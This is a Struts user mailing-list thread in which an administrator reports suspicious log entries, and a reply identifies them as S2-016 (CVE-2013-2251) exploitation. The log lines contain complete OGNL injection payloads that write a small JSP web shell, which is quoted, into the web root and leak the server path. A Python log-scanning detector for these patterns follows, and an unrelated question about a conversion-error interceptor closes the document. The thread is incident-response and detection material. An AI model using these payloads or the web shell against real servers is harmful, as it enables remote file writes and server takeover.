Re: Suspicious Request
On 2/13/2018 3:57 PM, Rajvinder Pal wrote:
> I am using struts2 2.3.16.1 version. That may be the reason 404 error is
> returned. But still I got a new file "one.jsp" inside the WAR. It has
> only one IF condition as given below:
>
> <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

Oh! Do you see the above block at the end of your index.jsp? If so then the attacker is or was able to append this block there! First delete that block and try the following to see if your webapp still has this vulnerability, by reproducing the attack:

> "GET /index.do?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E HTTP/1.1" 404 206 14249 0 ?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E -
Re: Suspicious Request
On 2/13/2018 12:34 PM, Rajvinder Pal wrote:
> Hi,
>
> I have a struts application deployed on application server. Some time I am
> receiving the below requests in web server logs. Not sure if I can post it
> in this struts forum. What should I do to restrict it? What kind of
> vulnerability is it?

Hi,

It seems it's S2-016 [1] (CVE-2013-2251 [2]).

[1] https://cwiki.apache.org/confluence/display/WW/S2-016
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251
Re: Suspicious Request
Hi Yasser,

I am using struts2 2.3.16.1 version. That may be the reason 404 error is returned. But still I got a new file "one.jsp" inside the WAR. It has only one IF condition as given below:

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

Regards,
Raj

On Tue, Feb 13, 2018 at 5:43 PM, Yasser Zamani wrote:
>
> On 2/13/2018 12:34 PM, Rajvinder Pal wrote:
> > Hi,
> >
> > I have a struts application deployed on application server. Some time I am
> > receiving the below requests in web server logs. Not sure if I can post it
> > in this struts forum. What should I do to restrict it? What kind of
> > vulnerability is it?
>
> Hi,
>
> It seems it's S2-016 [1] (CVE-2013-2251 [2]).
>
> [1] https://cwiki.apache.org/confluence/display/WW/S2-016
> [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251
Suspicious Request
Hi,

I have a struts application deployed on application server. Some time I am receiving the below requests in web server logs. Not sure if I can post it in this struts forum. What should I do to restrict it? What kind of vulnerability is it?

"GET /index.do?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E HTTP/1.1" 404 206 14249 0 ?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E -

"GET /index.php?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E HTTP/1.1" 404 207 1378 0 ?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E -

"GET /admin/index.action?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()} HTTP/1.1" 404 216 1634 0 ?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()} -

Regards,
Raj
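As an added detection example for the log lines quoted in this thread (not code from the Struts project or from any poster): a small Python pass over access-log lines that flags requests carrying a Struts action prefix (redirect:, redirectAction:, action:) followed by an OGNL expression, the S2-016 pattern, and separately flags requests to a JSP driven by f= and t= parameters like the one.jsp found in the WAR. S2-016 affected Struts 2.0.0 through 2.3.15 and was fixed in 2.3.15.1, so a patched server no longer evaluates the expression, but the scan still shows who is probing and whether a dropped file is being used; the log format and sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus, parse_qs

# Action prefixes that vulnerable Struts versions evaluated as OGNL (S2-016).
PREFIX_RE = re.compile(r'[?&](?:action|redirect|redirectAction):\$\{', re.I)
# Tokens seen in the decoded OGNL bodies of such requests.
OGNL_TOKENS = ('#context', '#_memberAccess', 'getRealPath', 'FileOutputStream', 'FileWriter')
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify(line):
    """Return (status, indicators) for one log line; indicators is [] when clean."""
    m = REQUEST_RE.search(line)
    if not m:
        return (None, [])
    # Decode once so %23 -> '#', %22 -> '"' and so on cannot hide the tokens.
    decoded = unquote_plus(m.group('target'))
    found = []
    if PREFIX_RE.search(decoded):
        found.append('s2-016-prefix')
    if any(tok in decoded for tok in OGNL_TOKENS):
        found.append('ognl-payload')
    # A dropped JSP like one.jsp is driven by f= (file name) and t= (content).
    path, _, query = decoded.partition('?')
    params = parse_qs(query, keep_blank_values=True)
    if path.lower().endswith('.jsp') and 'f' in params and 't' in params:
        found.append('dropped-jsp-use')
    return (int(m.group('status')), found)

def scan(lines):
    """Return [(line_number, status, indicators)] for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        status, found = classify(line)
        if found:
            hits.append((n, status, found))
    return hits

# Constructed sample lines (not from the original post). The first keeps the
# shape of the thread's request with the OGNL body cut to a harmless fragment.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Feb/2018:12:01:02 +0530] "GET /index.do?redirect:${%23req%3d'
    '%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27)} HTTP/1.1" 404 206',
    '203.0.113.7 - - [13/Feb/2018:12:01:09 +0530] "GET /one.jsp?f=x.jsp&t=hello HTTP/1.1" 200 12',
    '198.51.100.4 - - [13/Feb/2018:12:02:00 +0530] "GET /index.do?id=42 HTTP/1.1" 200 5120',
]

if __name__ == '__main__':
    for n, status, found in scan(SAMPLE_LOG):
        print(f'line {n}: HTTP {status} -> {", ".join(found)}')
```

A 404 on the flagged line, as in the thread, means the prefix was rejected; a hit on the dropped-JSP pattern with a 200 means the file is present and answering and should be removed along with a check of how it got there.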
Conversion Error Interceptor prevent errors for empty values
Can someone provide some clarification on whether this interceptor should be adding a field error when an empty string is passed to an Integer in the action? I am trying to prevent the field error from happening in this case. It looks like it should not be happening according to the docs: https://struts.apache.org/core-developers/conversion-error-interceptor.html , or am I not understanding what it is saying here:

"This interceptor extends ConversionErrorInterceptor but only adds conversion errors from the ActionContext to the field errors of the action if the field value is not null, "", or {""} (a size 1 String array with only an empty String). See ConversionErrorInterceptor for more information, as well as the Type Conversion documentation"

Paul R. Zepernick
Sr. Programmer Analyst
HealthSmart Benefit Solutions